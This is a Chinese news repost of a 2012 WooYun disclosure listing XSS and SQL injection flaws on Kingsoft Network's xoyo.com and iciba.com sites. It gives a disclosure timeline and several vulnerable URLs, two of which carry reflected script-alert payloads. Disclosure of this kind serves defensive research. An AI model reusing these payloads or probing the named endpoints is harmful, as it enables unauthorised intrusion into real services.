当前位置: 首页 > 软件资讯 > 新闻资讯 > 安全提醒 > 金山网络被曝光SQL注射漏洞

金山网络被曝光SQL注射漏洞

2012-11-06 13:02 来源:乌云 作者:末信 人气指数: 我要评论

漏洞标题: 金山网络漏洞集合
相关厂商: 金山网络
漏洞作者: Valo洛洛
提交时间: 2012-09-22
公开时间: 2012-11-06
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 20
漏洞状态: 厂商已经确认

漏洞详情

披露状态:

2012-09-22: 细节已通知厂商并且等待厂商处理中
2012-09-22: 厂商已经确认,细节仅向厂商公开
2012-10-02: 细节向核心白帽子及相关领域专家公开
2012-10-12: 细节向普通白帽子公开
2012-10-22: 细节向实习白帽子公开
2012-11-06: 细节向公众公开

简要描述:
苦逼学生下午翻墙出去玩,好基友@Circus就催我回来搞基,晚上回来看看,收获不少,xss,root注入应有尽有。

详细说明:
http://pay.my.xoyo.com/fillweb/kcoin/setPayPwd.jsp?passport=%3Cscript%3Ealert(/valo/)%3C/script%3E xss一枚
http://my.xoyo.com/fillweb/kcoin_error.jsp?errorMessage=%3Cscript%3Ealert(/valo/)%3C/script%3E xss一枚

http://app.e.iciba.com/index.php?appid=4&tid=28 root注入一枚。

金山网络被曝光SQL注射漏洞

http://hanyu.iciba.com/wiki/index.php?doc-create hdwiki存储型xss

http://zt.xoyo.com/yycs/gamequiz/index.php?act=showCard&pid=12024 root注入

金山网络被曝光SQL注射漏洞

修复方案:
这些问题修复什么的,真没的说。

为您推荐: 漏洞 SQL注射 金山网络
大家感兴趣的内容
小伙伴最爱的新闻
小伙伴还关注了以下信息
小伙伴关注的焦点

小伙伴都在关注的热门词

芈月传 老司机玩法 萌乐网 黑科技 坐骑揭秘 三国令 铁血皇城 竞技场攻略 书剑恩仇录 披风玩法 装备强化攻略 野外BOSS玩法 全网曝光 赤壁传说 半回合制国 ACT 哥们网 天书世界 奇珍商城 热血战歌 传奇宝藏抽奖 门徒 范伟打天下 打开方式 门徒获取玩法 三大萌宠简介 新手攻略 挂机系统简介 材料副本 大海战 鸵鸟 大黑 激情玩法 门徒战力提升 万世 强化属性 上古降魔 提升战力 装备攻略 九阴绝学 品质推荐 老干妈 激战来袭 大黑游戏 新服亮点 福利多多 画江山 资料片 玩家 九阴真经 江湖儿女 真实场景 现实 虚拟 随机副本 风色轨迹 听天由命 ppwan 神助攻 武林秘药 激活八大脉门 九天劫变 猎命格 天问 大型PVP 花千骨 激战更尽兴 网易mumu 手游玩家 安卓模拟器 安卓 单挑群战 武侠传说 女神 孙尚香专访 胸猛抱团 新游 占山为王 跨服城战 蜀山战纪 剑雨江湖 攻略 实时VR交互 七大女神代言 酷炫走江湖 世界四大杀手 玩家专访 三国经典 大制作 好玩网页游戏 盘点 宇宙霸主 境界玩法 莽荒纪 勇闯难关 镜像副本 荒漠霸主 装备精通 三大战役 鹌小彦奇谈